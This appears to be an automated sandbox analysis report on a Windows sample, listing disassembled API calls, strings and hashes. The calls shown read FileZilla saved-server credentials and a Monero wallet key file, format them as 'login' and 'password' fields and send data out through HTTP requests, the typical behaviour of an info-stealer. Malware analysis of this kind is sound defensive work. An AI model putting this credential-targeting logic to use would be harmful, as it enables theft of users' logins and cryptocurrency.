GetProcAddress.KERNEL32(752C0000,01725CE8), ref: 00BFA244
GetProcAddress.KERNEL32(752C0000,0173D480), ref: 00BFA25D
GetProcAddress.KERNEL32(752C0000,0173D5A0), ref: 00BFA275
GetProcAddress.KERNEL32(752C0000,01725B88), ref: 00BFA28D
GetProcAddress.KERNEL32(74EC0000,0172B650), ref: 00BFA2B3
GetProcAddress.KERNEL32(74EC0000,0172B678), ref: 00BFA2CB
GetProcAddress.KERNEL32(74EC0000,0173D5B8), ref: 00BFA2E3
GetProcAddress.KERNEL32(74EC0000,01725B08), ref: 00BFA2FC
GetProcAddress.KERNEL32(74EC0000,01725BC8), ref: 00BFA314
GetProcAddress.KERNEL32(74EC0000,0172B920), ref: 00BFA32C
GetProcAddress.KERNEL32(75BD0000,0173D5E8), ref: 00BFA352
GetProcAddress.KERNEL32(75BD0000,01725D08), ref: 00BFA36A
GetProcAddress.KERNEL32(75BD0000,017391D0), ref: 00BFA382
GetProcAddress.KERNEL32(75BD0000,0173D558), ref: 00BFA39B
GetProcAddress.KERNEL32(75BD0000,0173D4F8), ref: 00BFA3B3
GetProcAddress.KERNEL32(75BD0000,01725D48), ref: 00BFA3CB
GetProcAddress.KERNEL32(75BD0000,01725E48), ref: 00BFA3E4
GetProcAddress.KERNEL32(75BD0000,0173D4C8), ref: 00BFA3FC
GetProcAddress.KERNEL32(75BD0000,0173D5D0), ref: 00BFA414
GetProcAddress.KERNEL32(75A70000,01725D28), ref: 00BFA436
GetProcAddress.KERNEL32(75A70000,0173D498), ref: 00BFA44E
GetProcAddress.KERNEL32(75A70000,0173D4B0), ref: 00BFA466
GetProcAddress.KERNEL32(75A70000,0173D4E0), ref: 00BFA47F
GetProcAddress.KERNEL32(75A70000,0173D528), ref: 00BFA497
GetProcAddress.KERNEL32(75450000,01725DA8), ref: 00BFA4B8
GetProcAddress.KERNEL32(75450000,01725B28), ref: 00BFA4D1
GetProcAddress.KERNEL32(75DA0000,01725DC8), ref: 00BFA4F2
GetProcAddress.KERNEL32(75DA0000,0173D510), ref: 00BFA50A
GetProcAddress.KERNEL32(6F070000,01725AA8), ref: 00BFA530
GetProcAddress.KERNEL32(6F070000,01725AE8), ref: 00BFA548
GetProcAddress.KERNEL32(6F070000,01725B48), ref: 00BFA560
GetProcAddress.KERNEL32(6F070000,0173D570), ref: 00BFA579
GetProcAddress.KERNEL32(6F070000,01725B68), ref: 00BFA591
GetProcAddress.KERNEL32(6F070000,01725C88), ref: 00BFA5A9
GetProcAddress.KERNEL32(6F070000,01725BE8), ref: 00BFA5C2
GetProcAddress.KERNEL32(6F070000,01725C48), ref: 00BFA5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00BFA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00BFA607
GetProcAddress.KERNEL32(75AF0000,0173CFB8), ref: 00BFA629
GetProcAddress.KERNEL32(75AF0000,01739200), ref: 00BFA641
GetProcAddress.KERNEL32(75AF0000,0173CEC8), ref: 00BFA659
GetProcAddress.KERNEL32(75AF0000,0173CF40), ref: 00BFA672
GetProcAddress.KERNEL32(75D90000,01725DE8), ref: 00BFA693
GetProcAddress.KERNEL32(6E330000,0173D120), ref: 00BFA6B4
GetProcAddress.KERNEL32(6E330000,01725E08), ref: 00BFA6CD
GetProcAddress.KERNEL32(6E330000,0173CEE0), ref: 00BFA6E5
GetProcAddress.KERNEL32(6E330000,0173CF10), ref: 00BFA6FD

Strings

HttpQueryInfoA, xrefs: 00BFA5FC
InternetSetOptionA, xrefs: 00BFA5E5

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
Instruction ID: b45e5102ab6990b658e48f7ed790638235ff5e16168c70f684936f897e69e365
Opcode Fuzzy Hash: c106ee7e8803ea820bd5af3d21aeee13d17223c410d911eaf43bbe51e3424a19
Instruction Fuzzy Hash: 13620FB5500200AFC368DFAAEE8896637F9F74C70171C853BE60AE3264D739944BDB56

Function 00BE7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BE7724
RtlAllocateHeap.NTDLL(00000000), ref: 00BE772B
lstrcat.KERNEL32(?,01739CF0), ref: 00BE78DB
lstrcat.KERNEL32(?,?), ref: 00BE78EF
lstrcat.KERNEL32(?,?), ref: 00BE7903
lstrcat.KERNEL32(?,?), ref: 00BE7917
lstrcat.KERNEL32(?,0173E348), ref: 00BE792B
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE793F
lstrcat.KERNEL32(?,0173E468), ref: 00BE7952
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7966
lstrcat.KERNEL32(?,01739D78), ref: 00BE797A
lstrcat.KERNEL32(?,?), ref: 00BE798E
lstrcat.KERNEL32(?,?), ref: 00BE79A2
lstrcat.KERNEL32(?,?), ref: 00BE79B6
lstrcat.KERNEL32(?,0173E348), ref: 00BE79C9
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE79DD
lstrcat.KERNEL32(?,0173E468), ref: 00BE79F1
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7A04
lstrcat.KERNEL32(?,01739DE0), ref: 00BE7A18
lstrcat.KERNEL32(?,?), ref: 00BE7A2C
lstrcat.KERNEL32(?,?), ref: 00BE7A40
lstrcat.KERNEL32(?,?), ref: 00BE7A54
lstrcat.KERNEL32(?,0173E348), ref: 00BE7A68
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE7A7B
lstrcat.KERNEL32(?,0173E468), ref: 00BE7A8F
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7AA3
lstrcat.KERNEL32(?,01739E48), ref: 00BE7AB6
lstrcat.KERNEL32(?,?), ref: 00BE7ACA
lstrcat.KERNEL32(?,?), ref: 00BE7ADE
lstrcat.KERNEL32(?,?), ref: 00BE7AF2
lstrcat.KERNEL32(?,0173E348), ref: 00BE7B06
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE7B1A
lstrcat.KERNEL32(?,0173E468), ref: 00BE7B2D
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7B41
lstrcat.KERNEL32(?,0173E6B8), ref: 00BE7B55
lstrcat.KERNEL32(?,?), ref: 00BE7B69
lstrcat.KERNEL32(?,?), ref: 00BE7B7D
lstrcat.KERNEL32(?,?), ref: 00BE7B91
lstrcat.KERNEL32(?,0173E348), ref: 00BE7BA4
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE7BB8
lstrcat.KERNEL32(?,0173E468), ref: 00BE7BCC
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7BDF
lstrcat.KERNEL32(?,0173E720), ref: 00BE7BF3
lstrcat.KERNEL32(?,?), ref: 00BE7C07
lstrcat.KERNEL32(?,?), ref: 00BE7C1B
lstrcat.KERNEL32(?,?), ref: 00BE7C2F
lstrcat.KERNEL32(?,0173E348), ref: 00BE7C43
lstrcat.KERNEL32(?,0173E2D0), ref: 00BE7C56
lstrcat.KERNEL32(?,0173E468), ref: 00BE7C6A
lstrcat.KERNEL32(?,0173E4C8), ref: 00BE7C7E

Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00C017FC), ref: 00BE7606
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE7648
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020, : ), ref: 00BE765A
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE768F
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00C01804), ref: 00BE76A0
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00000000), ref: 00BE76D3
Part of subcall function 00BE75D0: lstrcat.KERNEL32(2FE47020,00C01808), ref: 00BE76ED
Part of subcall function 00BE75D0: task.LIBCPMTD ref: 00BE76FB

lstrcat.KERNEL32(?,0173EB28), ref: 00BE7E0B
lstrcat.KERNEL32(?,0173D750), ref: 00BE7E1E
lstrlen.KERNEL32(2FE47020), ref: 00BE7E2B
lstrlen.KERNEL32(2FE47020), ref: 00BE7E3B

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 619f55e0f8f4d3cfc2fedb73f5387f60bd1bd7106feae8515901737dbaaf0569
Instruction ID: a99a8a9138552a0d9f442566ca5a8b72a22b126c738268788222756948735e62
Opcode Fuzzy Hash: 619f55e0f8f4d3cfc2fedb73f5387f60bd1bd7106feae8515901737dbaaf0569
Instruction Fuzzy Hash: 8032E0B6900358ABCB25EBA1DC89DEA737CBB44700F445AD8F31962090DE74E78E8F51

Function 00BF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A

Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52

GetProcessHeap.KERNEL32(00000000,000F423F,00C00DBA,00C00DB7,00C00DB6,00C00DB3), ref: 00BF0362
RtlAllocateHeap.NTDLL(00000000), ref: 00BF0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00BF0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 00BF03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00BF0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BF0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BF0562
lstrcat.KERNEL32(?,profile: null), ref: 00BF0571
lstrcat.KERNEL32(?,url: ), ref: 00BF0580
lstrcat.KERNEL32(?,00000000), ref: 00BF0593
lstrcat.KERNEL32(?,00C01678), ref: 00BF05A2
lstrcat.KERNEL32(?,00000000), ref: 00BF05B5
lstrcat.KERNEL32(?,00C0167C), ref: 00BF05C4
lstrcat.KERNEL32(?,login: ), ref: 00BF05D3
lstrcat.KERNEL32(?,00000000), ref: 00BF05E6
lstrcat.KERNEL32(?,00C01688), ref: 00BF05F5
lstrcat.KERNEL32(?,password: ), ref: 00BF0604
lstrcat.KERNEL32(?,00000000), ref: 00BF0617
lstrcat.KERNEL32(?,00C01698), ref: 00BF0626
lstrcat.KERNEL32(?,00C0169C), ref: 00BF0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C00DB2), ref: 00BF068E

Strings

browser: FileZilla, xrefs: 00BF0559
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00BF02A4
login: , xrefs: 00BF05CA
url: , xrefs: 00BF0577
password: , xrefs: 00BF05FB
<User>, xrefs: 00BF0410
profile: null, xrefs: 00BF0568
<Port>, xrefs: 00BF03C6
<Pass encoding="base64">, xrefs: 00BF045A
<Host>, xrefs: 00BF037C

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 0010ae9d29c84fc6349e16fe07de5291d52b86e49026736cf49628e323576b4b
Instruction ID: fd3253fa34fcfbc8e52e44f8999dfbb1549d48c17e7692dab14a7365a0dfe417
Opcode Fuzzy Hash: 0010ae9d29c84fc6349e16fe07de5291d52b86e49026736cf49628e323576b4b
Instruction Fuzzy Hash: C5D1FEB591010CABCB18EBE4DD56EFEB3B8EF14300F544568F606B7095DA74AA0ECB61

Function 00BE5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

lstrlen.KERNEL32(00000000), ref: 00BE5193

Part of subcall function 00BF8EA0: CryptBinaryToStringA.CRYPT32(00000000,00BE5184,40000001,00000000,00000000,?,00BE5184), ref: 00BF8EC0

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE5207
StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE5340
HttpOpenRequestA.WININET(00000000,0173EAC8,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE53A4

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0173EB78,00000000,?,0173A700,00000000,?,00C019DC,00000000,?,00BF51CF), ref: 00BE5737
lstrlen.KERNEL32(00000000), ref: 00BE574B
GetProcessHeap.KERNEL32(00000000,?), ref: 00BE575C
RtlAllocateHeap.NTDLL(00000000), ref: 00BE5763
lstrlen.KERNEL32(00000000), ref: 00BE5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE57A9
lstrlen.KERNEL32(00000000), ref: 00BE57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE57E1
lstrlen.KERNEL32(00000000,?,?), ref: 00BE580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE584D
InternetCloseHandle.WININET(00000000), ref: 00BE58B1
InternetCloseHandle.WININET(00000000), ref: 00BE58BE
InternetCloseHandle.WININET(00000000), ref: 00BE58C8

Strings

------, xrefs: 00BE54F9
------, xrefs: 00BE5297
", xrefs: 00BE5706
", xrefs: 00BE5482
--, xrefs: 00BE5280
------, xrefs: 00BE53B7
", xrefs: 00BE55C4
------, xrefs: 00BE563B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: a70a30598829faf607c0c6f4dbf21f97cd923641e1fcf99dc34c4040f548cf97
Instruction ID: 2f277aa94399896d24aa211d51f86977142d5a62d4536f03235fb7ad7c5981e8
Opcode Fuzzy Hash: a70a30598829faf607c0c6f4dbf21f97cd923641e1fcf99dc34c4040f548cf97
Instruction Fuzzy Hash: 6132CBB192011CAADB18EBA4DC95FFEB3B8BF54740F4441A9B20A73091DF706A4DCB56

Function 00BEA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

